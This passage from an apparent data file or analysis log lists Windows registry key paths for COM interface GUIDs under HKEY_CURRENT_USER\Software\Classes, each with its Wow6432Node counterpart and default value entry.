1553. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\8A683C90-BA84-11CF-8110-00A0C9030074\\(Default)",
1554. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\8A683C91-BA84-11CF-8110-00A0C9030074",
1555. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\8A683C91-BA84-11CF-8110-00A0C9030074\\(Default)",
1556. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\8A683C91-BA84-11CF-8110-00A0C9030074",
1557. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\8A683C91-BA84-11CF-8110-00A0C9030074\\(Default)",
1558. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\04598FC6-866C-11CF-AB7C-00AA00C08FCF",
1559. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\04598FC6-866C-11CF-AB7C-00AA00C08FCF\\(Default)",
1560. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\04598FC6-866C-11CF-AB7C-00AA00C08FCF",
1561. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\04598FC6-866C-11CF-AB7C-00AA00C08FCF\\(Default)",
1562. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\04598FC7-866C-11CF-AB7C-00AA00C08FCF",
1563. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\04598FC7-866C-11CF-AB7C-00AA00C08FCF\\(Default)",
1564. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\04598FC7-866C-11CF-AB7C-00AA00C08FCF",
1565. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\04598FC7-866C-11CF-AB7C-00AA00C08FCF\\(Default)",
1566. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\29B86A70-F52E-11CE-9BCE-00AA00608E01",
1567. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\29B86A70-F52E-11CE-9BCE-00AA00608E01\\(Default)",
1568. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\29B86A70-F52E-11CE-9BCE-00AA00608E01",
1569. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\29B86A70-F52E-11CE-9BCE-00AA00608E01\\(Default)",
1570. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\04598FC8-866C-11CF-AB7C-00AA00C08FCF",
1571. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\04598FC8-866C-11CF-AB7C-00AA00C08FCF\\(Default)",
1572. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\04598FC8-866C-11CF-AB7C-00AA00C08FCF",
1573. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\04598FC8-866C-11CF-AB7C-00AA00C08FCF\\(Default)",
1574. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\9A4BBF53-4E46-101B-8BBD-00AA003E3B29",
1575. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\9A4BBF53-4E46-101B-8BBD-00AA003E3B29\\(Default)",
1576. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\9A4BBF53-4E46-101B-8BBD-00AA003E3B29",
1577. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\9A4BBF53-4E46-101B-8BBD-00AA003E3B29\\(Default)",
1578. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\5B9D8FC8-4A71-101B-97A6-00000B65C08B",
1579. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\5B9D8FC8-4A71-101B-97A6-00000B65C08B\\(Default)",
1580. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\5B9D8FC8-4A71-101B-97A6-00000B65C08B",
1581. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\5B9D8FC8-4A71-101B-97A6-00000B65C08B\\(Default)",
1582. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\CF3F94A0-F546-11CE-9BCE-00AA00608E01",
1583. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\CF3F94A0-F546-11CE-9BCE-00AA00608E01\\(Default)",
1584. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\CF3F94A0-F546-11CE-9BCE-00AA00608E01",
1585. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\CF3F94A0-F546-11CE-9BCE-00AA00608E01\\(Default)",
1586. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\04598FC1-866C-11CF-AB7C-00AA00C08FCF",
1587. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\04598FC1-866C-11CF-AB7C-00AA00C08FCF\\(Default)",
1588. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\04598FC1-866C-11CF-AB7C-00AA00C08FCF",
1589. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\04598FC1-866C-11CF-AB7C-00AA00C08FCF\\(Default)",
1590. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\04598FC4-866C-11CF-AB7C-00AA00C08FCF",
1591. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\04598FC4-866C-11CF-AB7C-00AA00C08FCF\\(Default)",
1592. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\04598FC4-866C-11CF-AB7C-00AA00C08FCF",
1593. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\04598FC4-866C-11CF-AB7C-00AA00C08FCF\\(Default)",
1594. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\8BD21D13-EC42-11CE-9E0D-00AA006002F3",
1595. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\8BD21D13-EC42-11CE-9E0D-00AA006002F3\\(Default)",
1596. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\8BD21D13-EC42-11CE-9E0D-00AA006002F3",
1597. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\8BD21D13-EC42-11CE-9E0D-00AA006002F3\\(Default)",
1598. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\8BD21D23-EC42-11CE-9E0D-00AA006002F3",
1599. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\8BD21D23-EC42-11CE-9E0D-00AA006002F3\\(Default)",
1600. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\8BD21D23-EC42-11CE-9E0D-00AA006002F3",
1601. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\8BD21D23-EC42-11CE-9E0D-00AA006002F3\\(Default)",
1602. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\8BD21D33-EC42-11CE-9E0D-00AA006002F3",
1603. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\8BD21D33-EC42-11CE-9E0D-00AA006002F3\\(Default)",
1604. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\8BD21D33-EC42-11CE-9E0D-00AA006002F3",
1605. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\8BD21D33-EC42-11CE-9E0D-00AA006002F3\\(Default)",
1606. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\8BD21D43-EC42-11CE-9E0D-00AA006002F3",
1607. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\8BD21D43-EC42-11CE-9E0D-00AA006002F3\\(Default)",
1608. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\8BD21D43-EC42-11CE-9E0D-00AA006002F3",
1609. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\8BD21D43-EC42-11CE-9E0D-00AA006002F3\\(Default)",
1610. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\8BD21D53-EC42-11CE-9E0D-00AA006002F3",
1611. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\8BD21D53-EC42-11CE-9E0D-00AA006002F3\\(Default)",
1612. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\8BD21D53-EC42-11CE-9E0D-00AA006002F3",
1613. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\8BD21D53-EC42-11CE-9E0D-00AA006002F3\\(Default)",
1614. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\8BD21D63-EC42-11CE-9E0D-00AA006002F3",
1615. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\8BD21D63-EC42-11CE-9E0D-00AA006002F3\\(Default)",
1616. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\8BD21D63-EC42-11CE-9E0D-00AA006002F3",
1617. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\8BD21D63-EC42-11CE-9E0D-00AA006002F3\\(Default)",
1618. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\04598FC3-866C-11CF-AB7C-00AA00C08FCF",
1619. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\04598FC3-866C-11CF-AB7C-00AA00C08FCF\\(Default)",
1620. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\04598FC3-866C-11CF-AB7C-00AA00C08FCF",
1621. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\04598FC3-866C-11CF-AB7C-00AA00C08FCF\\(Default)",
1622. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\A38BFFC3-A5A0-11CE-8107-00AA00611080",
1623. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\A38BFFC3-A5A0-11CE-8107-00AA00611080\\(Default)",
1624. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\A38BFFC3-A5A0-11CE-8107-00AA00611080",
1625. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\A38BFFC3-A5A0-11CE-8107-00AA00611080\\(Default)",
1626. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\944ACF93-A1E6-11CE-8104-00AA00611080",
1627. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\944ACF93-A1E6-11CE-8104-00AA00611080\\(Default)",
1628. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\944ACF93-A1E6-11CE-8104-00AA00611080",
1629. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\944ACF93-A1E6-11CE-8104-00AA00611080\\(Default)",
1630. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\04598FC2-866C-11CF-AB7C-00AA00C08FCF",
1631. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\04598FC2-866C-11CF-AB7C-00AA00C08FCF\\(Default)",
1632. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\04598FC2-866C-11CF-AB7C-00AA00C08FCF",
1633. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\04598FC2-866C-11CF-AB7C-00AA00C08FCF\\(Default)",
1634. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\79176FB3-B7F2-11CE-97EF-00AA006D2776",
1635. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\79176FB3-B7F2-11CE-97EF-00AA006D2776\\(Default)",
1636. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\79176FB3-B7F2-11CE-97EF-00AA006D2776",
1637. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\79176FB3-B7F2-11CE-97EF-00AA006D2776\\(Default)",
1638. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\4C599243-6926-101B-9992-00000B65C6F9",
1639. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\4C599243-6926-101B-9992-00000B65C6F9\\(Default)",
1640. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\4C599243-6926-101B-9992-00000B65C6F9",
1641. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\4C599243-6926-101B-9992-00000B65C6F9\\(Default)",
1642. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\5512D111-5CC6-11CF-8D67-00AA00BDCE1D",
1643. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\5512D111-5CC6-11CF-8D67-00AA00BDCE1D\\(Default)",
1644. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\5512D111-5CC6-11CF-8D67-00AA00BDCE1D",
1645. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\5512D111-5CC6-11CF-8D67-00AA00BDCE1D\\(Default)",
1646. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\5512D113-5CC6-11CF-8D67-00AA00BDCE1D",
1647. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\5512D113-5CC6-11CF-8D67-00AA00BDCE1D\\(Default)",
1648. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\5512D113-5CC6-11CF-8D67-00AA00BDCE1D",
1649. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\5512D113-5CC6-11CF-8D67-00AA00BDCE1D\\(Default)",
1650. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\5512D115-5CC6-11CF-8D67-00AA00BDCE1D",
1651. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\5512D115-5CC6-11CF-8D67-00AA00BDCE1D\\(Default)",
1652. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\5512D115-5CC6-11CF-8D67-00AA00BDCE1D",
1653. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\5512D115-5CC6-11CF-8D67-00AA00BDCE1D\\(Default)",
1654. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\5512D117-5CC6-11CF-8D67-00AA00BDCE1D",
1655. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\5512D117-5CC6-11CF-8D67-00AA00BDCE1D\\(Default)",
1656. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\5512D117-5CC6-11CF-8D67-00AA00BDCE1D",
1657. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\5512D117-5CC6-11CF-8D67-00AA00BDCE1D\\(Default)",
1658. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\5512D119-5CC6-11CF-8D67-00AA00BDCE1D",
1659. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\5512D119-5CC6-11CF-8D67-00AA00BDCE1D\\(Default)",
1660. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\5512D119-5CC6-11CF-8D67-00AA00BDCE1D",
1661. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\5512D119-5CC6-11CF-8D67-00AA00BDCE1D\\(Default)",
1662. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\5512D11B-5CC6-11CF-8D67-00AA00BDCE1D",
1663. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\5512D11B-5CC6-11CF-8D67-00AA00BDCE1D\\(Default)",
1664. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\5512D11B-5CC6-11CF-8D67-00AA00BDCE1D",
1665. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\5512D11B-5CC6-11CF-8D67-00AA00BDCE1D\\(Default)",
1666. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\5512D11D-5CC6-11CF-8D67-00AA00BDCE1D",
1667. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\5512D11D-5CC6-11CF-8D67-00AA00BDCE1D\\(Default)",
1668. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\5512D11D-5CC6-11CF-8D67-00AA00BDCE1D",
1669. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\5512D11D-5CC6-11CF-8D67-00AA00BDCE1D\\(Default)",
1670. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\5512D11F-5CC6-11CF-8D67-00AA00BDCE1D",
1671. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\5512D11F-5CC6-11CF-8D67-00AA00BDCE1D\\(Default)",
1672. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\5512D11F-5CC6-11CF-8D67-00AA00BDCE1D",
1673. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\5512D11F-5CC6-11CF-8D67-00AA00BDCE1D\\(Default)",
1674. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\5512D123-5CC6-11CF-8D67-00AA00BDCE1D",
1675. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\5512D123-5CC6-11CF-8D67-00AA00BDCE1D\\(Default)",
1676. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\5512D123-5CC6-11CF-8D67-00AA00BDCE1D",
1677. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\5512D123-5CC6-11CF-8D67-00AA00BDCE1D\\(Default)",
1678. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\5512D125-5CC6-11CF-8D67-00AA00BDCE1D",
1679. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\5512D125-5CC6-11CF-8D67-00AA00BDCE1D\\(Default)",
1680. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\5512D125-5CC6-11CF-8D67-00AA00BDCE1D",
1681. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\5512D125-5CC6-11CF-8D67-00AA00BDCE1D\\(Default)",
1682. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\978C9E22-D4B0-11CE-BF2D-00AA003F40D0",
1683. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\978C9E22-D4B0-11CE-BF2D-00AA003F40D0\\(Default)",
1684. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\978C9E22-D4B0-11CE-BF2D-00AA003F40D0",
1685. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\978C9E22-D4B0-11CE-BF2D-00AA003F40D0\\(Default)",
1686. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\7B020EC1-AF6C-11CE-9F46-00AA00574A4F",
1687. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\7B020EC1-AF6C-11CE-9F46-00AA00574A4F\\(Default)",
1688. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\7B020EC1-AF6C-11CE-9F46-00AA00574A4F",
1689. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\7B020EC1-AF6C-11CE-9F46-00AA00574A4F\\(Default)",
1690. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\8BD21D12-EC42-11CE-9E0D-00AA006002F3",
1691. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\8BD21D12-EC42-11CE-9E0D-00AA006002F3\\(Default)",
1692. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\8BD21D12-EC42-11CE-9E0D-00AA006002F3",
1693. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\8BD21D12-EC42-11CE-9E0D-00AA006002F3\\(Default)",
1694. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\8BD21D22-EC42-11CE-9E0D-00AA006002F3",
1695. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\8BD21D22-EC42-11CE-9E0D-00AA006002F3\\(Default)",
1696. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\8BD21D22-EC42-11CE-9E0D-00AA006002F3",
1697. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\8BD21D22-EC42-11CE-9E0D-00AA006002F3\\(Default)",
1698. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\8BD21D32-EC42-11CE-9E0D-00AA006002F3",
1699. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\8BD21D32-EC42-11CE-9E0D-00AA006002F3\\(Default)",
1700. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\8BD21D32-EC42-11CE-9E0D-00AA006002F3",
1701. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\8BD21D32-EC42-11CE-9E0D-00AA006002F3\\(Default)",
1702. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\8BD21D42-EC42-11CE-9E0D-00AA006002F3",
1703. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\8BD21D42-EC42-11CE-9E0D-00AA006002F3\\(Default)",
1704. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\8BD21D42-EC42-11CE-9E0D-00AA006002F3",
1705. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\8BD21D42-EC42-11CE-9E0D-00AA006002F3\\(Default)",
1706. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\8BD21D52-EC42-11CE-9E0D-00AA006002F3",
1707. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\8BD21D52-EC42-11CE-9E0D-00AA006002F3\\(Default)",
1708. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\8BD21D52-EC42-11CE-9E0D-00AA006002F3",
1709. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\8BD21D52-EC42-11CE-9E0D-00AA006002F3\\(Default)",
1710. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\8BD21D62-EC42-11CE-9E0D-00AA006002F3",
1711. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\8BD21D62-EC42-11CE-9E0D-00AA006002F3\\(Default)",
1712. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\8BD21D62-EC42-11CE-9E0D-00AA006002F3",
1713. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\8BD21D62-EC42-11CE-9E0D-00AA006002F3\\(Default)",
1714. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\7B020EC2-AF6C-11CE-9F46-00AA00574A4F",
1715. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\7B020EC2-AF6C-11CE-9F46-00AA00574A4F\\(Default)",
1716. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\7B020EC2-AF6C-11CE-9F46-00AA00574A4F",
1717. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\7B020EC2-AF6C-11CE-9F46-00AA00574A4F\\(Default)",
1718. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\7B020EC7-AF6C-11CE-9F46-00AA00574A4F",
1719. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\7B020EC7-AF6C-11CE-9F46-00AA00574A4F\\(Default)",
1720. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\7B020EC7-AF6C-11CE-9F46-00AA00574A4F",
1721. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\7B020EC7-AF6C-11CE-9F46-00AA00574A4F\\(Default)",
1722. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\79176FB2-B7F2-11CE-97EF-00AA006D2776",
1723. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\79176FB2-B7F2-11CE-97EF-00AA006D2776\\(Default)",
1724. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\79176FB2-B7F2-11CE-97EF-00AA006D2776",
1725. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\79176FB2-B7F2-11CE-97EF-00AA006D2776\\(Default)",
1726. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\4C5992A5-6926-101B-9992-00000B65C6F9",
1727. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\4C5992A5-6926-101B-9992-00000B65C6F9\\(Default)",
1728. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\4C5992A5-6926-101B-9992-00000B65C6F9",
1729. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\4C5992A5-6926-101B-9992-00000B65C6F9\\(Default)",
1730. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\796ED650-5FE9-11CF-8D68-00AA00BDCE1D",
1731. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\796ED650-5FE9-11CF-8D68-00AA00BDCE1D\\(Default)",
1732. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\796ED650-5FE9-11CF-8D68-00AA00BDCE1D",
1733. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\796ED650-5FE9-11CF-8D68-00AA00BDCE1D\\(Default)",
1734. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\47FF8FE0-6198-11CF-8CE8-00AA006CB389",
1735. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\47FF8FE0-6198-11CF-8CE8-00AA006CB389\\(Default)",
1736. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\47FF8FE0-6198-11CF-8CE8-00AA006CB389",
1737. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\47FF8FE0-6198-11CF-8CE8-00AA006CB389\\(Default)",
1738. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\47FF8FE1-6198-11CF-8CE8-00AA006CB389",
1739. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\47FF8FE1-6198-11CF-8CE8-00AA006CB389\\(Default)",
1740. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\47FF8FE1-6198-11CF-8CE8-00AA006CB389",
1741. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\47FF8FE1-6198-11CF-8CE8-00AA006CB389\\(Default)",
1742. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\47FF8FE2-6198-11CF-8CE8-00AA006CB389",
1743. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\47FF8FE2-6198-11CF-8CE8-00AA006CB389\\(Default)",
1744. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\47FF8FE2-6198-11CF-8CE8-00AA006CB389",
1745. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\47FF8FE2-6198-11CF-8CE8-00AA006CB389\\(Default)",
1746. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\47FF8FE3-6198-11CF-8CE8-00AA006CB389",
1747. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\47FF8FE3-6198-11CF-8CE8-00AA006CB389\\(Default)",
1748. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\47FF8FE3-6198-11CF-8CE8-00AA006CB389",
1749. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\47FF8FE3-6198-11CF-8CE8-00AA006CB389\\(Default)",
1750. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\47FF8FE4-6198-11CF-8CE8-00AA006CB389",
1751. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\47FF8FE4-6198-11CF-8CE8-00AA006CB389\\(Default)",
1752. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\47FF8FE4-6198-11CF-8CE8-00AA006CB389",
1753. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\47FF8FE4-6198-11CF-8CE8-00AA006CB389\\(Default)",
1754. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\47FF8FE5-6198-11CF-8CE8-00AA006CB389",
1755. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\47FF8FE5-6198-11CF-8CE8-00AA006CB389\\(Default)",
1756. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\47FF8FE5-6198-11CF-8CE8-00AA006CB389",
1757. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\47FF8FE5-6198-11CF-8CE8-00AA006CB389\\(Default)",
1758. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\47FF8FE6-6198-11CF-8CE8-00AA006CB389",
1759. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\47FF8FE6-6198-11CF-8CE8-00AA006CB389\\(Default)",
1760. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\47FF8FE6-6198-11CF-8CE8-00AA006CB389",
1761. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\47FF8FE6-6198-11CF-8CE8-00AA006CB389\\(Default)",
1762. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\47FF8FE8-6198-11CF-8CE8-00AA006CB389",
1763. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\47FF8FE8-6198-11CF-8CE8-00AA006CB389\\(Default)",
1764. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\47FF8FE8-6198-11CF-8CE8-00AA006CB389",
1765. "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\47FF8FE8-6198-11CF-8CE8-00AA006CB389\\(Default)",
1766. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\47FF8FE9-6198-11CF-8CE8-00AA006CB389",
1767. "HKEY_CURRENT_USER\\Software\\Classes\\Wow6432Node\\Interface\\47FF8FE9-6198-11CF-8CE8-00AA006CB389\\(Default)",
